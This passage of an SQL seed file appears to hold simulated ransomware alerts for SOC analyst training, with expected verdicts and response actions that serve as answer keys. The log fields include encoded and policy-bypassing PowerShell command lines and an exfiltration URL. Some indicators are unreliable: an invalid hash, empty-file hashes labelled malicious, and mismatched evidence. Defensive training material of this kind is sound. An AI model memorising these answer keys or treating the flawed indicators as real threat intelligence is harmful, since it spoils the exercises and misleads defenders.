distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Campaign Detected\",\"date\":\"2026-03-15T20:58:15.567Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1568, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'A ransomware payload was executed on a compromised system following a successful phishing attack. Immediate action is required to prevent further damage.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:00Z\",\"event_id\":\"EDR-Exec-12345\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process_name\":\"ransomware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransomware.exe\",\"event_description\":\"Execution of a known ransomware payload detected on endpoint.\",\"os\":\"Windows 10\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash corresponds to a known ransomware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalDatabase\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in ransomware attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1569, 'Establishing Persistence', 'high', 'System Logs', 'LockBit ensures persistence by modifying system configurations and creating backdoors, making it challenging to remove them.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"action\":\"Registry Modification\",\"registry_key\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\LockBit\",\"file\":\"C:\\\\Windows\\\\System32\\\\lockbit.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Unauthorized modification of registry to establish persistence.\",\"process_id\":\"1234\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"IP associated with known LockBit operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with LockBit ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.571Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"Registry Modification\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\LockBit\\\",\\\"file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lockbit.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Unauthorized modification of registry to establish persistence.\\\",\\\"process_id\\\":\\\"1234\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1570, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'LockBit malware is attempting lateral movement within the network by accessing multiple internal systems. Unauthorized access detected from an internal compromised host to another system.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.20\",\"protocol\":\"SMB\",\"action\":\"Access\",\"username\":\"jdoe\",\"file_accessed\":\"\\\\\\\\192.168.1.20\\\\C$\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"external_ip\":\"203.0.113.45\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by a potentially compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Targeted internal system.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware activity.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1571, 'Data Exfiltration in Progress', 'critical', 'Data Loss Prevention (DLP) Systems', 'Sensitive data is being exfiltrated from the internal network to an external IP address associated with known malicious activity. This is a precursor to potential ransomware encryption.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:48:32Z\",\"event_id\":\"dlp-2030\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"45.67.89.123\",\"file_name\":\"confidential_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"data_size\":\"2GB\",\"url\":\"https://malicious-site.com/exfil\"}', '2026-03-15 19:15:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.67.89.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with LockBit ransomware operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file being exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Hash of the exfiltrated file matches known malicious patterns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1572, 'Suspicious VPN Login Attempt', 'high', 'VPN logs', 'An unauthorized login attempt was detected on a Cisco VPN endpoint. The attack was initiated by exploiting known vulnerabilities or using stolen credentials. The attacker IP is flagged as malicious in multiple threat intelligence sources.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:45Z\",\"event_id\":\"vpn-1234567\",\"vpn_endpoint\":\"vpn.corpnetwork.com\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"protocol\":\"IPSec\",\"login_status\":\"failed\",\"reason\":\"Invalid credentials\",\"vpn_software_version\":\"Cisco VPN Client 4.9\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"malicious_flag\":true}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple intrusion attempts and malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Known user within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware targeting Cisco VPN clients.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1573, 'Malicious Payload Execution Detected', 'critical', 'Endpoint detection and response (EDR) alerts', 'Following successful VPN compromise, the attackers execute a sophisticated ransomware payload, initiating their encryption process on the compromised endpoint.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-06T14:22:58Z\",\"event_id\":\"123456789\",\"event_type\":\"execution\",\"host\":{\"hostname\":\"compromised-host\",\"ip\":\"10.0.0.15\"},\"user\":{\"username\":\"jdoe\"},\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3d2e4f5b6c9e10f11a12b13c14d15e16f17g18h19i1j20k21l2m22n2o23\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3d2e4f5b6c9e10f11a12b13c14d15e16f17g18h19i1j20k21l2m22n2o23\"}}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e4f5b6c9e10f11a12b13c14d15e16f17g18h19i1j20k21l2m22n2o23\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware payload\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 